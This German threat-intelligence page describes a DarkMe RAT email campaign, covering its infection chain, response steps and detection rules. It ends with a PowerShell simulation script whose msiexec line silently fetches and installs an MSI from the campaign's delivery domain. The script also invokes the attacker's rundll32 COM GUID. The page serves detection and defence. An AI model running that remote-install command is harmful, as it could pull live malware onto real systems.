DarkMe-E-Mail-Kampagne erweitert Zielgruppen in APT-RAT-Angriffen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine neue Kampagne, die den DarkMe Spy-RAT ausliefert, wurde beobachtet, die sich auf Social Engineering statt auf Software-Exploits stützt. Angreifer verteilen eine .pif Datei per E-Mail, die eine mehrstufige Infektionskette auslöst, die MSIEXEC und mehrere auf VB6 basierende Loader umfasst. Der Wegfall von Zero-Day-Exploits hin zu großflächigem Social Engineering deutet auf einen Wechsel zu kostengünstigeren, breiteren und weniger selektiven Angriffsmethoden hin.
Untersuchung
Huntress identifizierte die Kampagne, nachdem eine .pif Datei entdeckt wurde, die den Windows Installer startet, um ein Remote-MSI-Paket abzurufen. Die Analyse ergab eine komplexe mehrstufige Kette, die ein Skript zur Bereitstellung namens prnfig.wsf, Registrierungsimporte und die Ausführung eines COM-Objekts über rundll32.exe /staumfasst. Die Endphase verwendet Process Hollowing, um das DarkMe-Payload in die signierte Microsoft-Binärdatei clspack.exe.
zu injizieren.
Verteidiger sollten auf rundll32.exe achten, das mit dem /sta Schalter und einer GUID ohne begleitenden DLL-Pfad gestartet wird. Sicherheitsteams sollten auch erkennen, wenn msiexec entfernte MSI-Pakete über HTTPS abruft und die Ausführung von .pif Dateien untersuchen. Signierte Microsoft-Binärdateien, die von ungewöhnlichen Orten wie %AppData% aus gestartet werden, sollten zusätzliche Aufmerksamkeit erhalten.
Reaktion
Wenn verdächtige Aktivitäten festgestellt werden, isolieren Sie den betroffenen Endpunkt sofort, um die C2-Kommunikation zu unterbrechen und Datenexfiltration zu verhindern. Beenden Sie den gehüllten clspack.exe Prozess und entfernen Sie bösartige Artefakte aus %AppData%ComponentsFolder and %AppData%Microsoft. Entfernen Sie die Persistenz, die durch den benutzerdefinierten URL-Protokoll-Handler und den HKCU Run Schlüssel erstellt wurde. Setzen Sie die Anmeldeinformationen des betroffenen Benutzers zurück und behandeln Sie lokal gespeicherte Kryptowährungs-Wallets als potenziell kompromittiert.
Angriffsablauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (via registry_event)
Ungewöhnliche Erweiterung von ausführbaren Binärdateien (via process_creation)
LOLBAS WScript / CScript (via process_creation)
Möglicher Remote-MSI-Datei-Installationsversuch (via cmdline)
Verdächtige Befehls- und Steuerungskommunikation durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)
IOCs (HashSha256) zum Erkennen: DarkMe E-Mail-Kampagne erweitert Zielgebiet für APT RAT
IOCs (SourceIP) zum Erkennen: DarkMe E-Mail-Kampagne erweitert Zielgebiet für APT RAT
IOCs (DestinationIP) zum Erkennen: DarkMe E-Mail-Kampagne erweitert Zielgebiet für APT RAT
Erkennung von C2-Kommunikation und Bereitstellungsdomäne für DarkMe RAT [Windows-Netzwerkverbindung]
Erkennung von bösartigen Aktivitäten der DarkMe RAT-Kampagne [Windows-Prozesserstellung]
Simulation-Ausführung
-
Angriffsnarrativ & Befehle: Der Gegner beabsichtigt, den DarkMe RAT einzusetzen, um Persistenz zu bewahren. Um signaturbasierte Erkennung zu umgehen, nutzt der Angreifer
msiexecum ein Remote-Payload von einer kompromittierten Domain zu ziehen (onlineview365.com). Nach der ersten Infektion verwendet der Angreiferrundll32.exeum ein bestimmtes COM-Objekt über eine GUID zu initiieren, um Code im Speicher auszuführen, und nutzt anschließendcmd.exeum Registrierungs-Konfigurationen aus einer Textdatei zu importieren, um die Umgebung für einewscript.exebasierte Payload-Ausführung vorzubereiten. -
Regressionstest-Skript:
# DarkMe RAT Simulationsskript # Dieses Skript simuliert genau die in der Sigma-Regel definierten Befehlszeilen. Write-Host "[+] DarkMe RAT-Simulation wird gestartet..." -ForegroundColor Cyan # 1. Remote-Download von msiexec simulieren Write-Host "[*] Remote-Download von msiexec wird simuliert..." Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue # 2. Ausführung von rundll32 COM-Objekt simulieren Write-Host "[*] Ausführung von rundll32 COM wird simuliert..." Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue # 3. cmd.exe Registrierungsimport simulieren Write-Host "[*] Registrierungsimport von cmd.exe wird simuliert..." $tempFile = "$env:TEMPfiletext2.txt" "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait # 4. Ausführung von wscript.exe via cmd/rundll32 Parent-Chain simulieren Write-Host "[*] Ausführung von wscript.exe aus AppData wird simuliert..." $scriptPath = "$env:APPDATAmalicious_script.vbs" "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii # Um die spezifische Parent/Child-Regel auszulösen: # Parent: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} # Child: wscript.exe %AppData%malicious_script.vbs Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait Write-Host "[+] Simulation abgeschlossen." -ForegroundColor Green -
Bereinigungskommandos:
# Bereinigen von Simulationsartefakten Write-Host "[+] Bereinigung läuft..." -ForegroundColor Yellow Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue Write-Host "[+] Bereinigung abgeschlossen." -ForegroundColor Green